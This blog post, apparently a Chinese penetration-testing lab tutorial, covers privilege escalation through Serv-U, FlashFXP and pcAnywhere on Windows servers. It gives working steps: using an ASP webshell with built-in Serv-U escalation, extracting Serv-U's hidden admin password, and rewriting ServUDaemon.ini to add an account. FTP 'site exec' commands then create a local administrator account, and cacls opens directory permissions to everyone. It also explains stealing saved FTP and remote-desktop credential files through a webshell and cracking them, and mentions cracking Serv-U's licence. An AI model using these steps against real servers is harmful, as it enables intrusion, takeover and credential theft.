20.第三方软件提权(上)

服务器一般都会装一些管理软件 , 我们可以尝试通过这些服务器软件进行提权

0x01. Serv-u安全性测试

1.1 Serv-u的安装

双击安装

image-20210128175632813

然后就是下一步下一步安装了

默认安装路径 :

C:\Program Files\RhinoSoft.com\Serv-U

安装补丁

因为这个软件默认是收费的 , 所以我们通过打补丁破解一下

image-20210128180027495

image-20210128180149345

image-20210128180207064

安装汉化

image-20210128180311123

注意安装路径默认是不正确的 , 需要手动修改 , 如果有报错 , 也不要管它

1.2 配置服务器

新建一个域

image-20210128180732536

域名 : ftp.mhx.com
端口 : 21

新建用户

image-20210128181000829

密码 : 123456
主目录 : C:\wmpub

image-20210128181116200

设置用户权限

image-20210128181144634

image-20210128181305087

1.3 本机连接测试

win  + r  cmd  回车

ftp
open 192.168.1.108
mhx
123456
dir

image-20210128181536211

或者通过工具连接

image-20210128184432609

这样就能通过ftp服务 , 本地和远程主机之间可以进行文件传输 , 一脱就行了

0x02. 通过木马提权

有的木马自带servu提权 , 很方便

2.1 木马讲解

dgnmm.asp

image-20210128185712539

复制到虚拟机中 , 然后右键属性 --> 安全 --> 添加一个IUSR...用户 --> 三个权限

http://192.168.1.108:89/dgnmm.asp
密码 : Skull.

image-20210128185950137

最炫的一个asp木马 , 这个木马自带就有通过Servu-提权 , 这才是这个木马的牛逼之处

image-20210128190327090

当你安装完servu之后就会默认启用一个端口 : 43958 , 同时servu也有一个默认的超级用户LocalAdministrator

但是装servu的人都不知道有这样一个账号 , 以及他的密码 , 这个账号和密码保存在 :

安装目录
C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.exe

通过菜刀将ServUDaemon.exe下载到本地 , 用C32工具打开 , 依然是一脱就行

image-20210128191317450

然后用16进制打开 , 搜索字符串 --> 密码

image-20210128191525665

2.2 创建账号

因为当前的servu是超级用户 , 所以可以执行操作系统命令

image-20210128192244817

image-20210128192227639

发现只能用他自带的admin$ , 创建其他的用户都是普通权限的

0x03. 修改配置文件提权

3.1 修改配置文件

前提 : 必须有写入权限

文件路径:C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini

image-20210128195004501

将文件内容复制到记事本修改

image-20210128195202126

Serv-u密码=前面随机2个字母+MD5值

image-20210128195623027

[GLOBAL]Version=6.2.0.0ProcessID=2824UseUPnP=1[Domain1]User1=mhx|1|0User2=mhx2|1|0[USER=mhx|1]Password=qo4C5461A8840186C64F329BF8F4CA40D6HomeDir=c:\wmpubPasswordLastChange=1611828679TimeOut=600Maintenance=SystemAccess1=C:\wmpub|RWAMELCDP[USER=mhx2|1]Password=qo4C5461A8840186C64F329BF8F4CA40D6HomeDir=c:\wmpubPasswordLastChange=1611828679TimeOut=600Maintenance=SystemAccess1=C:\wmpub|RWAMELCDP[DOMAINS]Domain1=192.168.1.108||21|ftp.mhx.com|1|0|0Domain2=0.0.0.0||65500|goldsun|2|0|0[Domain2]User1=go|1|0[USER=go|2]Password=riE2B38F8D9A79CDE95C01FBEA7894B138HomeDir=c:\RelPaths=1PasswordLastChange=1611832915TimeOut=600Maintenance=SystemAccess1=c:\|RWAMELCDP

将修改好的文件内容替换到源文件中 , 点击保存

image-20210128195821388

如果没有权限用菜刀的终端设置目录有写入的权限权限

echo y|cacls "C:\Program Files\RhinoSoft.com\Serv-U" /t /p everyone:f

这里发现并不好用 , 既然是做实验 , 那就手动在win2k3中设置权限 , 然后再次点击保存

image-20210128200334274

在服务端查看

image-20210128200741117

而且权限还是配好的 , 这里就不展开查看了

3.2 创建账号

同样打开本地cmd窗口 , 用ftp连接对方服务器 , 然后输入以下代码

quote site exec net user mhx3 123456 /addquote site exec net localgroup administrators mhx3 /add

image-20210128201253482

欧了

补充 : 5.04以下版本可用ServUX.exe进行远程溢出 , 基本上是遇不到了

0x04. FlashFXP安全性测试

FlashFXP是一个功能强大的FXP/ FTP软件,融合了CuteFTP、BpFTP、 LeapFTP等一些其他优秀FTP软件的优点,

支持彩色文字显示; 多文件夹选择文件;缓存文件夹等。

对于FlashFXP安全性来讲,渗透测试人员只需下载quick.dat、sites.dat、stats.dat这三个文件进行本地替换,就

可以获取登录密码 , 因为在FlashFXP他连接的账号和密码都保存在那三个文件中

通过菜刀把这三个文件从别人的服务器上下载下来 , 然后替换本地的那三个文件 , 这样你本地的FlashFXP就有服

务器上的那些账号和密码的记录了

利用星号读取器 , 就可以查看密码了

image-20210128202151047

0x05. PCanyWhere安全性测试

PCanyWhere是Symantec(赛门铁克)开发的一套老牌远程控制软件。

默认安装路径为

C:\Program Files\Symantec\pcAnywhere\

*.cif文件默认路径为

C:\DocumentS and Settings\All Users\Application Data\Symantec\pcAnywhere\Hosts\

*.cif文件保存的有远程连接服务器的账号和密码 , 我们下载下来 , 通过工具解密就可以了, 直接脱

工具 : PCAnyPass.exe

也就是说服务器安装了这些远程的工具后 , 我们怎么样破解他们的密码

0x06. 补充

C:\Program Files

当拿到了webshel的时候一定要去目录点一点 , 看看对方服务器下到底装了什么软件 , 这是超级无敌必须要做的

看看都装了什么软件 , 软件的密码一般都放在软件安装目录下的配置文件 , 看看能不能破解出来密码 , 远程连接

服务器 , 如果可以 , 这就是一个远程马

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/xcymn/p/15721529.html